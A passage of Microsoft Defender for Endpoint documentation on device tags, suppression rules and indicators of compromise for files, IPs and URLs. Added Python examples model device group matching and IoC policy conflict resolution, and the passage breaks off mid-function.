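Added example; not Microsoft's code. Encodes what the article states: rows of
one property are OR'ed (up to 10 per property), a device matching several
groups lands only in the highest-ranked group (rank 1 is highest), unmatched
devices go to "Ungrouped devices (default)", and a group with no Entra user
groups assigned is accessible to every portal user.
Assumptions: different property types are AND'ed, an empty property imposes no
condition, matching is case-insensitive equality, level labels are placeholders.
"""
from dataclasses import dataclass, field

MAX_ROWS_PER_PROPERTY = 10  # limit stated in the article (tag, device name, domain)


@dataclass
class Device:
    name: str
    domain: str
    os_platform: str
    tags: set = field(default_factory=set)


@dataclass
class DeviceGroup:
    name: str
    rank: int                       # 1 = highest priority during matching
    remediation_level: str          # automated remediation level (placeholder labels)
    names: list = field(default_factory=list)         # OR'ed rows
    domains: list = field(default_factory=list)       # OR'ed rows
    tags: list = field(default_factory=list)          # OR'ed rows
    os_platforms: list = field(default_factory=list)  # OR'ed rows
    user_groups: list = field(default_factory=list)   # Entra groups granted access

    def is_valid(self) -> bool:
        """Reject definitions that exceed the 10-rows-per-property limit."""
        return all(len(rows) <= MAX_ROWS_PER_PROPERTY
                   for rows in (self.names, self.domains, self.tags))

    def matches(self, d: Device) -> bool:
        checks = []
        if self.names:
            checks.append(d.name.lower() in {n.lower() for n in self.names})
        if self.domains:
            checks.append(d.domain.lower() in {x.lower() for x in self.domains})
        if self.tags:
            checks.append(bool({t.lower() for t in d.tags} & {t.lower() for t in self.tags}))
        if self.os_platforms:
            checks.append(d.os_platform.lower() in {o.lower() for o in self.os_platforms})
        # A rule with no rows at all matches nothing here (assumption).
        return bool(checks) and all(checks)


# Built-in catch-all: rank can't be changed and it can't be deleted, but its
# remediation level and user groups can be edited.
UNGROUPED = DeviceGroup("Ungrouped devices (default)", rank=10**9, remediation_level="Semi")


def assign_group(device: Device, groups: list) -> DeviceGroup:
    """Return the single group the device lands in: the highest rank among all matches."""
    matched = [g for g in groups if g.matches(device)]
    if not matched:
        return UNGROUPED
    return min(matched, key=lambda g: g.rank)


def can_user_access(group: DeviceGroup, user_entra_groups: set) -> bool:
    """A device group with no Entra groups assigned is accessible to all portal users."""
    if not group.user_groups:
        return True
    return bool(set(group.user_groups) & user_entra_groups)


# Constructed sample definitions (illustrative names, not real tenant data).
GROUPS = [
    DeviceGroup("Finance servers", rank=1, remediation_level="Full",
                domains=["corp.example.com"], tags=["Finance"],
                os_platforms=["WindowsServer2019", "WindowsServer2022"],
                user_groups=["SOC-Tier2"]),
    DeviceGroup("All corp servers", rank=2, remediation_level="Semi",
                domains=["corp.example.com"],
                os_platforms=["WindowsServer2019", "WindowsServer2022"]),
    DeviceGroup("Workstations", rank=3, remediation_level="Full",
                os_platforms=["Windows10", "Windows11"], user_groups=["SOC-Tier1"]),
]

FIN_SRV = Device("fin-sql-01", "corp.example.com", "WindowsServer2022", {"Finance"})
HR_SRV = Device("hr-file-01", "corp.example.com", "WindowsServer2019", {"HR"})
LAPTOP = Device("lt-0042", "corp.example.com", "Windows11", set())
MAC = Device("mac-07", "corp.example.com", "macOS", set())

if __name__ == "__main__":
    for dev in (FIN_SRV, HR_SRV, LAPTOP, MAC):
        g = assign_group(dev, GROUPS)
        print(f"{dev.name:<12} -> {g.name} (remediation: {g.remediation_level})")
```

The finance server matches both "Finance servers" and "All corp servers"; rank decides, so it receives the rank-1 group's remediation level and access list. The macOS device matches nothing and lands in the default group, which is why the default group's own remediation level and user groups deserve review.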

Related topics
Manage portal access using role-based access control
Create and manage device tags
Get list of tenant device groups using Graph API



Create and manage device tags
Article • 11/15/2023

Note

Want to experience Microsoft Defender XDR? Learn more about how you can
evaluate and pilot Microsoft Defender XDR.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Add tags on devices to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident. Tags can be used as a filter in the
Device inventory view, or to group devices. For more information on device grouping,
see Create and manage device groups.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

You can add tags on devices using the following ways:

Using the portal
Setting a registry key value

Note

There may be some latency between the time a tag is added to a device and its
availability in the devices list and device page.

To add device tags using API, see Add or remove device tags API.

Add and manage device tags using the portal

1. Select the device that you want to manage tags on. You can select or search for a
device from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.

Devices inventory - Select the device name from the list of devices.

Search box - Select Device from the drop-down menu and enter the device
name.

You can also get to the alert page through the file and IP views.

2. Select Manage tags from the row of Response actions.

3. Type to find or create tags.

Tags are added to the device view and will also be reflected on the Devices inventory
view. You can then use the Tags filter to see the relevant list of devices.

Note

Filtering might not work on tag names that contain parentheses or commas.

When you create a new tag, a list of existing tags is displayed. The list only shows
tags created through the portal. Existing tags created from client devices will not be
displayed.

You can also delete tags from this view.

Add device tags by setting a registry key value

Note

Applicable only on the following devices:

Windows 11
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2
Windows Server 2008 R2 SP1
Windows 8.1
Windows 7 SP1

Note

The maximum number of characters that can be set in a tag is 200.

Devices with similar tags can be handy when you need to apply contextual action on a
specific list of devices.

Use the following registry key entry to add a tag on a device:

Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced
Threat Protection\DeviceTagging\
Registry key value (REG_SZ): Group
Registry key data: Name of the tag you want to set

Note

The device tag is part of the device information report that's generated once a day.
As an alternative, you may choose to restart the endpoint, which would transfer a new
device information report.

If you need to remove a tag that was added using the above Registry key, clear the
contents of the Registry key data instead of removing the 'Group' key.

Add device tags by creating a custom profile in Microsoft Intune

You can use Microsoft Intune to define and apply device tags. You can perform this task
by creating a device configuration profile using custom settings in Intune. For more
information, see Create a profile with custom settings in Intune.

In the Create the profile procedure, for step 3, choose either macOS or Windows
10 and later, depending on the devices you want to tag.

For Windows 10 or later, in the OMA-URI settings section, for Data type, choose
String. For OMA-URI, type (or paste)
./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group

For macOS, follow the guidance in Use custom settings for macOS devices in
Microsoft Intune.



Manage suppression rules
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

There might be scenarios where you need to suppress alerts from appearing in the
portal. You can create suppression rules for specific alerts that are known to be
innocuous such as known tools or processes in your organization. For more information
on how to suppress alerts, see Suppress alerts.

You can view a list of all the suppression rules and manage them in one place. You can
also turn an alert suppression rule on or off.

1. Log in to Microsoft Defender XDR using an account with the Security
administrator or Global administrator role assigned.

2. In the navigation pane, select Settings > Endpoints > Rules > Alert suppression.
The list of suppression rules that users in your organization have created is
displayed.

3. Select a rule by clicking on the check-box beside the rule name.

4. Click Turn rule on, Edit rule, or Delete rule. When making changes to a rule, you
can choose to release alerts that it has already suppressed, regardless whether or
not these alerts match the new criteria.

View details of a suppression rule

1. In the navigation pane, select Settings > Endpoints > Rules > Alert suppression.
The list of suppression rules that users in your organization have created is
displayed.

2. Click on a rule name. Details of the rule are displayed. You'll see the rule details such
as status, scope, action, number of matching alerts, created by, and date when the
rule was created. You can also view associated alerts and the rule conditions.

Related topics
Manage alerts



Create indicators
Article • 01/19/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Tip

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Indicator of compromise (IoC) overview

An Indicator of compromise (IoC) is a forensic artifact, observed on the network or host.
An IoC indicates - with high confidence - a computer or network intrusion has occurred.
IoCs are observable, which links them directly to measurable events. Some IoC examples
include:

hashes of known malware
signatures of malicious network traffic
URLs or domains that are known malware distributors

To halt other compromise or prevent breaches of known IoCs, successful IoC tools
should be able to detect all malicious data that is enumerated by the tool's rule set. IoC
matching is an essential feature in every endpoint protection solution. This capability
gives SecOps the ability to set a list of indicators for detection and for blocking
(prevention and response).

Organizations can create indicators that define the detection, prevention, and exclusion
of IoC entities. You can define the action to be taken as well as the duration for when to
apply the action, and the scope of the device group to apply it to.

This video shows a walkthrough of creating and adding indicators:

https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw?postJsllMsg=true

About Microsoft indicators

As a general rule, you should only create indicators for known bad IoCs, or for any files /
websites that should be explicitly allowed in your organization. For more information on
the types of sites that Defender for Endpoint can block by default, see Microsoft
Defender SmartScreen overview.

False Positive (FP) refers to a SmartScreen false positive, such that it's considered to be
malware or phish, but actually isn't a threat, so you want to create an allow policy for it.

You can also help drive improvements to Microsoft's security intelligence by submitting
false positives, and suspicious or known-bad IoCs for analysis. If a warning or block is
incorrectly shown for a file or application, or if you suspect an undetected file is
malware, you can submit a file to Microsoft for review. For more information, see Submit
files for analysis .

IP/URL indicators

You can use IP/URL indicators to unblock users from a SmartScreen false positive (FP) or
to override a Web Content Filtering (WCF) block.

You can use URL and IP indicators to manage site access. You can create interim IP and
URL indicators to temporarily unblock users from a SmartScreen block. You might also
have indicators that you keep for a long period of time to selectively bypass web
content filtering blocks.

Consider the case where you have a web content filtering categorization for a particular
site that is correct. In this example, you have web content filtering set to block all social
media, which is correct for your overall organizational goals. However, the marketing
team has a real need to use a specific social media site for advertising and
announcements. In that case, you can unblock the specific social media site using IP or
URL indicators for the specific group (or groups) to use.

See Web protection and Web content filtering.

IP/URL Indicators: Network protection and the TCP three-way handshake

With network protection, the determination of whether to allow or block access to a site
is made after the completion of the three-way handshake via TCP/IP. Thus, when a site is
blocked by network protection, you might see an action type of ConnectionSuccess
under NetworkConnectionEvents in the Microsoft Defender portal, even though the site
was blocked. NetworkConnectionEvents are reported from the TCP layer, and not from
network protection. After the three-way handshake has completed, access to the site is
allowed or blocked by network protection.

Here's an example of how that works:

1. Suppose that a user attempts to access a website on their device. The site happens
to be hosted on a dangerous domain, and it should be blocked by network
protection.

2. The three-way handshake via TCP/IP commences. Before it completes, a
NetworkConnectionEvents action is logged, and its ActionType is listed as
ConnectionSuccess. However, as soon as the three-way handshake process
completes, network protection blocks access to the site. All of this happens quickly.
A similar process occurs with Microsoft Defender SmartScreen; it's when the
three-way handshake completes that a determination is made, and access to a site is
either blocked or allowed.

3. In the Microsoft Defender portal, an alert is listed in the alerts queue. Details of
that alert include both NetworkConnectionEvents and AlertEvents. You can see that
the site was blocked, even though you also have a NetworkConnectionEvents item
with the ActionType of ConnectionSuccess.

File hash indicators

In some cases, creating a new indicator for a newly identified file IoC - as an immediate
stop-gap measure - might be appropriate to block files or even applications. However,
using indicators to attempt to block an application might not provide the expected
results as applications are typically composed of many different files. The preferred
methods of blocking applications are to use Windows Defender Application Control
(WDAC) or AppLocker.

Because each version of an application has a different file hash, using indicators to block
hashes isn't recommended.

Windows Defender Application Control (WDAC)

Certificate indicators

In some cases, you may want to allow or block a specific certificate that's used to sign a
file or application in your organization. Certificate indicators are supported in Defender for
Endpoint, if they use the .CER or .PEM file format. See Create indicators based on
certificates for more details.

IoC detection engines

Currently, the supported Microsoft sources for IoCs are:

Cloud detection engine of Defender for Endpoint
Automated investigation and remediation (AIR) engine in Microsoft Defender for
Endpoint
Endpoint prevention engine (Microsoft Defender Antivirus)

Cloud detection engine

The cloud detection engine of Defender for Endpoint regularly scans collected data and
tries to match the indicators you set. When there's a match, action is taken according to
the settings you specified for the IoC.

Endpoint prevention engine

The same list of indicators is honored by the prevention agent. This means that if Microsoft
Defender Antivirus is the primary antivirus configured, the matched indicators are
treated according to the settings. For example, if the action is "Alert and Block",
Microsoft Defender Antivirus prevents file executions (block and remediate) and a
corresponding alert appears. On the other hand, if the Action is set to "Allow", Microsoft
Defender Antivirus doesn't detect or block the file.

Automated investigation and remediation engine

The automated investigation and remediation engine behaves similarly to the endpoint
prevention engine. If an indicator is set to "Allow", automated investigation and
remediation ignores a "bad" verdict for it. If set to "Block", automated investigation and
remediation treats it as "bad".

The EnableFileHashComputation setting computes the file hash for the cert and file IoC
during file scans. It supports IoC enforcement of hashes and certs belonging to trusted
applications. It's concurrently enabled with the allow or block file setting.
EnableFileHashComputation is enabled manually through Group Policy, and is disabled
by default.

Enforcement types for Indicators

When your security team creates a new indicator (IoC), the following actions are
available:

Allow – the IoC is allowed to run on your devices.
Audit – an alert is triggered when the IoC runs.
Warn – the IoC prompts a warning that the user can bypass.
Block execution - the IoC won't be allowed to run.
Block and remediate - the IoC won't be allowed to run and a remediation action
will be applied to the IoC.

Note

Using Warn mode will prompt your users with a warning if they open a risky app or
website. The prompt won't block them from allowing the application or website to
run, but you can provide a custom message and links to a company page that
describes appropriate usage of the app. Users can still bypass the warning and
continue to use the app if they need. For more information, see Govern apps
discovered by Microsoft Defender for Endpoint.

You can create an indicator for:

Files
IP addresses
URLs/domains
Certificates

The table below shows exactly which actions are available per indicator (IoC) type:

IoC type            Available actions
Files               Allow, Audit, Warn, Block execution, Block and remediate
IP addresses        Allow, Audit, Warn, Block execution
URLs and domains    Allow, Audit, Warn, Block execution
Certificates        Allow, Block and remediate

The functionality of pre-existing IoCs won't change. However, the indicators were
renamed to match the currently supported response actions:

The "alert only" response action was renamed to "audit" with the generated alert
setting enabled.
The "alert and block" response was renamed to "block and remediate" with the
optional generate alert setting.

The IoC API schema and the threat IDs in advanced hunting are updated to align with the
renaming of the IoC response actions. The API schema changes apply to all IoC Types.

Note

There is a limit of 15,000 indicators per tenant. File and certificate indicators do not
block exclusions defined for Microsoft Defender Antivirus. Indicators are not
supported in Microsoft Defender Antivirus when it is in passive mode.

The format for importing new indicators (IoCs) has changed according to the new
updated actions and alerts settings. We recommend downloading the new CSV
format that can be found at the bottom of the import panel.

Known issues and limitations

Customers might experience issues with alerts for Indicators of Compromise. The
following scenarios are situations where alerts aren't created or are created with
inaccurate information. Each issue is investigated by our engineering team.

Block indicators – Generic alerts with informational severity only will be fired.
Custom alerts (that is, custom title and severity) aren't fired in these cases.
Warn indicators – Generic alerts and custom alerts are possible in this scenario,
however, the results aren't deterministic due to an issue with the alert detection
logic. In some cases, customers might see a generic alert, whereas a custom alert
might show in other cases.
Allow – No alerts are generated (by design).
Audit - Alerts are generated based on the severity provided by the customer.
In some cases, alerts coming from EDR detections might take precedence over
alerts stemming from antivirus blocks, in which case an informational alert will be
generated.

Microsoft Store apps cannot be blocked by Defender because they're signed by
Microsoft.

Related articles
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Create contextual IoC
Use the Microsoft Defender for Endpoint indicators API
Use partner integrated solutions



Create indicators for files
Article • 03/08/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Prevent further propagation of an attack in your organization by banning potentially
malicious files or suspected malware. If you know a potentially malicious portable
executable (PE) file, you can block it. This operation will prevent it from being read,
written, or executed on devices in your organization.

There are three ways you can create indicators for files:

By creating an indicator through the settings page
By creating a contextual indicator using the add indicator button from the file
details page
By creating an indicator through the Indicator API

Before you begin

It's important to understand the following prerequisites prior to creating indicators for
files:

This feature is available if your organization uses Microsoft Defender Antivirus (in
active mode) and Cloud-based protection is enabled. For more information, see
Manage cloud-based protection.

The Antimalware client version must be 4.18.1901.x or later. See Monthly platform
and engine versions.

Supported on devices with Windows 10, version 1703 or later, Windows Server
2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2022.

Note

Windows Server 2016 and Windows Server 2012 R2 will need to be
onboarded using the instructions in Onboard Windows servers for this
feature to work. Custom file indicators with the Allow, Block and Remediate
actions are now also available in the enhanced antimalware engine
capabilities for macOS and Linux.

To start blocking files, you first need to turn on the "block or allow" feature in
Settings.

This feature is designed to prevent suspected malware (or potentially malicious files)
from being downloaded from the web. It currently supports portable executable (PE)
files, including .exe and .dll files. The coverage will be extended over time.

Important

In Defender for Endpoint Plan 1 and Defender for Business, you can create an
indicator to block or allow a file. In Defender for Business, your indicator is applied
across your environment and cannot be scoped to specific devices.

Create an indicator for files from the settings page

1. In the navigation pane, select Settings > Endpoints > Indicators (under Rules).

2. Select the File hashes tab.

3. Select Add item.

4. Specify the following details:

Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the device group (scoping isn't available in
Defender for Business).

Note

Device Group creation is supported in both Defender for Endpoint Plan 1
and Plan 2.

5. Review the details in the Summary tab, then select Save.

Create a contextual indicator from the file details page

One of the options when taking response actions on a file is adding an indicator for the
file. When you add an indicator hash for a file, you can choose to raise an alert and
block the file whenever a device in your organization attempts to run it.

Files automatically blocked by an indicator won't show up in the file's Action center, but
the alerts will still be visible in the Alerts queue.

Public Preview: Alerting on file blocking actions

Important

Information in this section (Public Preview for Automated investigation and
remediation engine) relates to prerelease product which might be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

The current supported actions for file IOC are allow, audit and block, and remediate.
After choosing to block a file, you can choose whether triggering an alert is needed. In
this way, you'll be able to control the number of alerts getting to your security
operations teams and make sure only required alerts are raised.

In Microsoft Defender XDR, go to Settings > Endpoints > Indicators > Add New File
Hash.

Choose to Block and remediate the file.

Choose whether to Generate an alert on the file block event and define the alert settings:

The alert title
The alert severity
Category
Description
Recommended actions

Important

Typically, file blocks are enforced and removed within a couple of minutes, but
can take upwards of 30 minutes.
If there are conflicting file IoC policies with the same enforcement type and
target, the policy of the more secure hash will be applied. An SHA-256 file
hash IoC policy will win over an SHA-1 file hash IoC policy, which will win over
an MD5 file hash IoC policy if the hash types define the same file. This is
always true regardless of the device group.
In all other cases, if conflicting file IoC policies with the same enforcement
target are applied to all devices and to the device's group, then for a device,
the policy in the device group will win.
If the EnableFileHashComputation group policy is disabled, the blocking
accuracy of the file IoC is reduced. However, enabling
EnableFileHashComputation may impact device performance. For example,
copying large files from a network share onto your local device, especially
over a VPN connection, might have an effect on device performance.

For more information about the EnableFileHashComputation group policy, see
Defender CSP.
For more information on configuring this feature on Defender for Endpoint on
Linux and macOS, see Configure file hash computation feature on Linux and
Configure file hash computation feature on macOS.

Public Preview: Advanced hunting capabilities

Important

Information in this section (Public Preview for Automated investigation and
remediation engine) relates to prerelease product which may be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

You can query the response action activity in advanced hunting. Below is a sample
advanced hunting query:

Console

search in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents,
DeviceLogonEvents)
Timestamp > ago(30d)
| where AdditionalFields contains "EUS:Win32/CustomEnterpriseBlock!cl"

For more information about advanced hunting, see Proactively hunt for threats with
advanced hunting.

Below are other threat names that can be used in the sample query from above:

Files:

EUS:Win32/CustomEnterpriseBlock!cl
EUS:Win32/CustomEnterpriseNoAlertBlock!cl

Certificates:

EUS:Win32/CustomCertEnterpriseBlock!cl

The response action activity is also viewable in the device timeline.

Policy conflict handling

Conflicts between certificate and file IoC policies are handled in the following order:

If the file isn't allowed by Windows Defender Application Control and AppLocker
enforce mode policy/policies, then Block

Else if the file is allowed by the Microsoft Defender Antivirus exclusion, then Allow

Else if the file is blocked or warned by a block or warn file IoC, then Block/Warn

Else if the file is blocked by SmartScreen, then Block

Else if the file is allowed by an allow file IoC policy, then Allow

Else if the file is blocked by ASR rules, CFA, AV, then Block

Else Allow (passes Windows Defender Application Control & AppLocker policy, no
IoC rules apply to it)

Note

In situations when Microsoft Defender Antivirus is set to Block, but Defender for
Endpoint - Indicators - File hash or Certificate is set to Allow, the policy will default
to Allow.

If there are conflicting file IoC policies with the same enforcement type and target, the
policy of the more secure (meaning longer) hash will be applied. For example, an SHA-
256 file hash IoC policy will win over an MD5 file hash IoC policy if both hash types
define the same file.

Warning

Policy conflict handling for files and certs differ from policy conflict handling for
domains/URLs/IP addresses.

Microsoft Defender Vulnerability Management's block vulnerable application features
uses the file IoCs for enforcement and will follow the above conflict handling order.

Examples

Component                                      Component enforcement   File indicator action   Result
Attack surface reduction file path exclusion   Allow                   Block                   Block
Attack surface reduction rule                  Block                   Allow                   Allow
Windows Defender Application Control           Allow                   Block                   Allow
Windows Defender Application Control           Block                   Allow                   Block
Microsoft Defender Antivirus exclusion         Allow                   Block                   Allow
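The ordered list under "Policy conflict handling" and the two tie-break rules for conflicting file IoCs (the more secure hash wins regardless of device group; otherwise the device-group policy beats the all-devices policy) are easiest to reason about as a short decision function. The following is an added example written for this page, not Microsoft's code; the field names of FileContext and FileIoc are assumptions used only for illustration. It walks the list exactly as the article states it and checks the result against the Examples table. One table row, Windows Defender Application Control with Allow and a Block file indicator, is listed as Allow, which the ordered list as written does not produce (step 3 would block), so that row is left out of the check and the other four are verified.

```python
"""File / certificate IoC policy conflict resolution.

Added example; not Microsoft's code. resolve() walks the ordered list from
"Policy conflict handling" as the article gives it; winning_ioc() applies the
tie-break rules for conflicting file IoCs (stronger hash wins regardless of
device group; otherwise the device-group policy beats the all-devices policy).
Field names are assumptions for illustration.
"""
from dataclasses import dataclass
from typing import Optional

ALLOW, BLOCK, WARN = "Allow", "Block", "Warn"


@dataclass
class FileContext:
    """What each component would decide for one file on one device."""
    wdac_applocker_allows: bool = True     # False = denied by an enforce-mode WDAC/AppLocker policy
    mdav_exclusion_allows: bool = False    # True = covered by a Microsoft Defender Antivirus exclusion
    file_ioc_action: Optional[str] = None  # ALLOW, BLOCK, WARN or None (no matching file/cert IoC)
    smartscreen_blocks: bool = False
    asr_cfa_av_blocks: bool = False        # ASR rules, controlled folder access or AV detection


def resolve(ctx: FileContext) -> str:
    """Return Allow / Block / Warn following the article's ordered list."""
    if not ctx.wdac_applocker_allows:         # 1. not allowed by WDAC/AppLocker enforce mode
        return BLOCK
    if ctx.mdav_exclusion_allows:             # 2. allowed by an MDAV exclusion
        return ALLOW
    if ctx.file_ioc_action in (BLOCK, WARN):  # 3. block or warn file IoC
        return ctx.file_ioc_action
    if ctx.smartscreen_blocks:                # 4. blocked by SmartScreen
        return BLOCK
    if ctx.file_ioc_action == ALLOW:          # 5. allow file IoC
        return ALLOW
    if ctx.asr_cfa_av_blocks:                 # 6. ASR rules, CFA, AV
        return BLOCK
    return ALLOW                              # 7. nothing applies


# Hash strength order stated in the article: SHA-256 > SHA-1 > MD5.
HASH_STRENGTH = {"sha256": 3, "sha1": 2, "md5": 1}


@dataclass
class FileIoc:
    hash_type: str       # "sha256", "sha1" or "md5"
    action: str          # ALLOW / BLOCK / WARN
    scope: str = "all"   # "all" devices, or the name of one device group


def winning_ioc(iocs: list, device_group: str) -> Optional[FileIoc]:
    """Among IoCs that describe the same file with the same enforcement type,
    pick the one that applies to a device in `device_group`."""
    applicable = [i for i in iocs if i.scope in ("all", device_group)]
    if not applicable:
        return None
    # Rule 1: the more secure (longer) hash wins, regardless of device group.
    best = max(HASH_STRENGTH[i.hash_type] for i in applicable)
    candidates = [i for i in applicable if HASH_STRENGTH[i.hash_type] == best]
    # Rule 2: otherwise a policy scoped to the device's group beats one for all devices.
    scoped = [i for i in candidates if i.scope != "all"]
    return (scoped or candidates)[0]


# Rows of the Examples table as (description, context, expected result).
TABLE_ROWS = [
    ("ASR file path exclusion Allow, indicator Block",
     FileContext(asr_cfa_av_blocks=False, file_ioc_action=BLOCK), BLOCK),
    ("ASR rule Block, indicator Allow",
     FileContext(asr_cfa_av_blocks=True, file_ioc_action=ALLOW), ALLOW),
    ("WDAC Block, indicator Allow",
     FileContext(wdac_applocker_allows=False, file_ioc_action=ALLOW), BLOCK),
    ("MDAV exclusion Allow, indicator Block",
     FileContext(mdav_exclusion_allows=True, file_ioc_action=BLOCK), ALLOW),
]


def check_table() -> bool:
    """True when every listed table row is reproduced by resolve()."""
    return all(resolve(ctx) == expected for _, ctx, expected in TABLE_ROWS)


if __name__ == "__main__":
    for desc, ctx, expected in TABLE_ROWS:
        print(f"{desc:<45} -> {resolve(ctx)} (table: {expected})")
    conflict = [FileIoc("md5", BLOCK, scope="Finance servers"), FileIoc("sha256", ALLOW)]
    print("winning IoC:", winning_ioc(conflict, "Finance servers"))
```

The last two lines of the usage show why hash choice matters operationally: a group-scoped MD5 block indicator loses to a tenant-wide SHA-256 allow indicator for the same file, so block indicators should be created with the strongest hash available.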

See also
Create indicators

Create indicators for IPs and URLs/domains

Create indicators based on certificates

Manage indicators

Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Create indicators for IPs and
URLs/domains
Article • 10/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Overview
By creating indicators for IPs and URLs or domains, you can now allow or block IPs,
URLs, or domains based on your own threat intelligence. You can also warn users with a
prompt if they open a risky app. The prompt won't stop them from using the app but
you can provide a custom message and links to a company page that describes
appropriate usage of the app. Users can still bypass the warning and continue to use the
app if they need.

To block malicious IPs/URLs (as determined by Microsoft), Defender for Endpoint can
use:

Windows Defender SmartScreen for Microsoft browsers
Network Protection for non-Microsoft browsers, or calls made outside of a browser

The threat-intelligence data set to block malicious IPs/URLs is managed by Microsoft.

You can block malicious IPs/URLs through the settings page or by machine groups, if
you deem certain groups to be more or less at risk than others.

Note

Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.

Before you begin

It's important to understand the following prerequisites prior to creating indicators for
IPs, URLs, or domains:

Network Protection requirements

URL/IP allow and block requires that the Microsoft Defender for Endpoint component
Network Protection is enabled in block mode. For more information on Network
Protection and configuration instructions, see Enable network protection.

Supported operating systems


Windows 10, version 1709 or later
Windows 11
Windows Server 2016
Windows Server 2012 R2
Windows Server 2019
Windows Server 2022
macOS
Linux
iOS
Android

Windows Server 2016 and Windows Server 2012 R2 requirements
Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the
instructions in Onboard Windows servers.

Microsoft Defender Antivirus version requirements


The Antimalware client version must be 4.18.1906.x or later.

Custom network indicators requirements


Ensure that Custom network indicators is enabled in Microsoft Defender XDR >
Settings > Advanced features. For more information, see Advanced features.

For support of indicators on iOS, see Microsoft Defender for Endpoint on iOS.
For support of indicators on Android, see Microsoft Defender for Endpoint on Android.

IoC indicator list limitations


Only external IPs can be added to the indicator list. Indicators can't be created for
internal IPs. For web protection scenarios, we recommend using the built-in capabilities
in Microsoft Edge. Microsoft Edge leverages Network Protection to inspect network
traffic and allows blocks for TCP, HTTP, and HTTPS (TLS).

Non-Microsoft Edge and Internet Explorer processes


For processes other than Microsoft Edge and Internet Explorer, web protection scenarios
leverage Network Protection for inspection and enforcement:

IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS))
Only single IP addresses are supported (no CIDR blocks or IP ranges) in custom
indicators
Encrypted URLs (full path) can only be blocked on first-party browsers (Internet
Explorer, Edge)
Encrypted URLs (FQDN only) can be blocked in third-party browsers (that is, other
than Internet Explorer, Edge)
Full URL path blocks can be applied for unencrypted URLs
If there are conflicting URL indicator policies, the longer path is applied. For
example, the URL indicator policy https://support.microsoft.com/office takes
precedence over the URL indicator policy https://support.microsoft.com.

Network protection and the TCP three-way handshake
With network protection, the determination of whether to allow or block access to a site
is made after the completion of the three-way handshake via TCP/IP. Thus, when a site is
blocked by network protection, you might see an action type of ConnectionSuccess
under NetworkConnectionEvents in the Microsoft Defender portal, even though the site
was blocked. NetworkConnectionEvents are reported from the TCP layer, and not from
network protection. After the three-way handshake has completed, access to the site is
allowed or blocked by network protection.

Here's an example of how that works:

1. Suppose that a user attempts to access a website on their device. The site happens
to be hosted on a dangerous domain, and it should be blocked by network
protection.

2. The three-way handshake via TCP/IP commences. Before it completes, a
NetworkConnectionEvents action is logged, and its ActionType is listed as
ConnectionSuccess. However, as soon as the three-way handshake process
completes, network protection blocks access to the site. All of this happens quickly.
A similar process occurs with Microsoft Defender SmartScreen; it's when the three-
way handshake completes that a determination is made, and access to a site is
either blocked or allowed.

3. In the Microsoft Defender portal, an alert is listed in the alerts queue. Details of
that alert include both NetworkConnectionEvents and AlertEvents. You can see that
the site was blocked, even though you also have a NetworkConnectionEvents item
with the ActionType of ConnectionSuccess.
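To make the point concrete, here is an added example (not Microsoft code) that labels each ConnectionSuccess event as blocked or unconfirmed by correlating it with the alert events that follow it, using constructed records. The field names, the alert title and the 60-second correlation window are assumptions.

```python
"""Reconcile ConnectionSuccess events with network protection alerts.

Added example, not Microsoft code: NetworkConnectionEvents come from the
TCP layer, so a blocked site still shows ConnectionSuccess; the block is
visible only in the AlertEvents that follow. Field names, the 60-second
correlation window and all sample records are constructed assumptions.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed NetworkConnectionEvents as seen in the device timeline.
NETWORK_EVENTS: List[Dict[str, str]] = [
    {"Timestamp": "2024-02-21T10:00:01Z", "DeviceId": "dev-01",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "malicious.example"},
    {"Timestamp": "2024-02-21T10:05:00Z", "DeviceId": "dev-01",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "intranet.example"},
    {"Timestamp": "2024-02-21T11:00:00Z", "DeviceId": "dev-02",
     "ActionType": "ConnectionSuccess", "RemoteUrl": "malicious.example"},
    {"Timestamp": "2024-02-21T11:00:05Z", "DeviceId": "dev-02",
     "ActionType": "ConnectionFailed", "RemoteUrl": "malicious.example"},
]

# Constructed AlertEvents: network protection raised one alert for dev-01
# right after the handshake completed; dev-02 has no alert at all.
ALERT_EVENTS: List[Dict[str, str]] = [
    {"Timestamp": "2024-02-21T10:00:02Z", "DeviceId": "dev-01",
     "Title": "Connection blocked by custom network indicator (constructed)",
     "RemoteUrl": "malicious.example"},
]


def _parse_ts(value: str) -> datetime:
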